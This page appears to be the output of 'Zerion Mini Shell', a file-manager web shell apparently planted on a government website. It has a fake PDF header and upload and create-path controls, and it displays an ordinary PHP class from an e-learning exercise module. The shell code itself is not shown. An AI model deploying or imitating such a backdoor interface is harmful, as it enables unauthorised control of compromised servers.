%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/cursos.tjamich.gob.mx/main/exercise/
Upload File :
Create Path :
Current File : /home/tjamichg/cursos.tjamich.gob.mx/main/exercise/HotSpotCombination.php

<?php
/* For licensing terms, see /license.txt */

/**
 * HotSpotCombination.
 */
class HotSpotCombination extends HotSpot
{
    public $typePicture = 'hotspot_co.png';
    public $explanationLangVar = 'HotSpotCombination';

    /**
     * HotSpot constructor.
     */
    public function __construct()
    {
        parent::__construct();
        $this->type = HOT_SPOT_COMBINATION;
    }
}

Zerion Mini Shell 1.0